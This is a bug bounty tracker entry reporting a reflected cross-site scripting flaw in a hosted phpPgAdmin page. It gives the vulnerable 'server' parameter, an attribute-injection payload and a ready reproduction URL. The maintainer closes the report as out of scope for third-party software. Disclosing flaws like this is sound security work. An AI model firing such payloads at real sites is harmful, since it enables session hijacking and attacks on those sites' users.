FS#284 : Cross site scripting ( XSS )

Status Closed
Assigned To

cbay
Private

Attached to Project: Security vulnerabilities
Opened by testing25 - 10.01.2026
Last edited by cbay - 12.01.2026

FS#284 - Cross site scripting ( XSS )

Vulnerable URL : https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=

Parameter : server=

Payload : "autofocus onfocus=alert(document.domain) ======================
Reproduce… Visit this URL you get an XSS pop-up : https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%22autofocus%20onfocus=alert(document.domain)%20

Screenshot 2026-01-10 at 7.31... (101.9 KiB)

Closed by cbay
12.01.2026 08:54
Reason for closing: Invalid

Comments (1)
Related Tasks (0/0)

cbay commented on 12.01.2026 08:54

Hello,

This is an issue in phpPgAdmin, you should report it to them. Unfixed vulnerabilities from third party applications are excluded from our bug bounty program.

Kind regards,
Cyril

	Tasks related to this task (0)

Loading...

Keyboard shortcuts

Available keyboard shortcuts

Alt + ⇧ Shift + l Login Dialog / Logout
Alt + ⇧ Shift + a Add new task
Alt + ⇧ Shift + m My searches
Alt + ⇧ Shift + t focus taskid search

Tasklist

o open selected task
j move cursor down
k move cursor up

Task Details

n Next task
p Previous task
Alt + ⇧ Shift + e ↵ Enter Edit this task
Alt + ⇧ Shift + w watch task
Alt + ⇧ Shift + y Close Task

Task Editing

Alt + ⇧ Shift + s save task